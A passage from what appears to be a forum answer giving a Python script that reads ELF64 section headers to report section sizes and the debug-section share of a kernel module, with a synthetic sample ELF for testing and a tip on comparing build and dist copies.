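    return name.startswith('.debug') or name.startswith('.rela.debug')


def size_report(data, top=10):
    """Largest file-occupying sections first: [(name, file_bytes, is_debug)]."""
    rows = sorted(elf64_sections(data), key=lambda r: r[3], reverse=True)
    return [(name, size, is_debug_section(name)) for name, _t, _s, size in rows[:top] if size]


def debug_share(data):
    """(debug_bytes, total_section_bytes): how much --strip-debug would remove."""
    secs = elf64_sections(data)
    total = sum(s[3] for s in secs)
    dbg = sum(s[3] for s in secs if is_debug_section(s[0]))
    return dbg, total


def build_sample_elf(sections):
    """Constructed test input: a minimal ET_REL ELF64 for AArch64 holding the given
    (name, sh_type, size) sections plus the mandatory NULL section and .shstrtab."""
    names = [''] + [n for n, _, _ in sections] + ['.shstrtab']
    shstr, name_off = b'', {}
    for n in names:
        name_off[n] = len(shstr)
        shstr += n.encode() + b'\0'
    body, layout, cursor = b'', [(0, 0, 0, 0)], 64
    for n, t, size in sections:
        layout.append((name_off[n], t, cursor, size))
        if t != SHT_NOBITS:                 # NOBITS sections have size but no file bytes
            body += b'\x90' * size
            cursor += size
    layout.append((name_off['.shstrtab'], SHT_STRTAB, cursor, len(shstr)))
    body += shstr
    shoff = cursor + len(shstr)
    ehdr = b'\x7fELF' + bytes([2, 1, 1, 0]) + b'\0' * 8   # ELFCLASS64, little-endian, v1
    ehdr += struct.pack('<HHIQQQIHHHHHH', 1, 0xb7, 1, 0, 0, shoff, 0, 64, 0, 0, 64,
                        len(layout), len(layout) - 1)
    shdrs = b''.join(struct.pack('<IIQQQQIIQQ', n, t, 0, 0, off, size, 0, 0, 1, 0)
                     for n, t, off, size in layout)
    return ehdr + body + shdrs


# Made-up module: a few KB of code dwarfed by DWARF, the shape the thread describes.
SAMPLE_KO = build_sample_elf([
    ('.text', SHT_PROGBITS, 4096),
    ('.rodata', SHT_PROGBITS, 512),
    ('.debug_info', SHT_PROGBITS, 300000),
    ('.debug_str', SHT_PROGBITS, 40000),
    ('.bss', SHT_NOBITS, 8192),
])

if __name__ == '__main__':
    import sys
    blob = open(sys.argv[1], 'rb').read() if len(sys.argv) > 1 else SAMPLE_KO
    for name, size, dbg in size_report(blob):
        print('%-24s %10d %s' % (name, size, 'debug' if dbg else ''))
    print('debug bytes / section bytes: %d / %d' % debug_share(blob))
```

Run it as `python3 kosize.py path/to/mymod.ko` against both the 432K build output and the 92K dist copy; if the difference is all in .debug_* rows the two modules are the same code, and the dist file is the one to compare against the module in the repository.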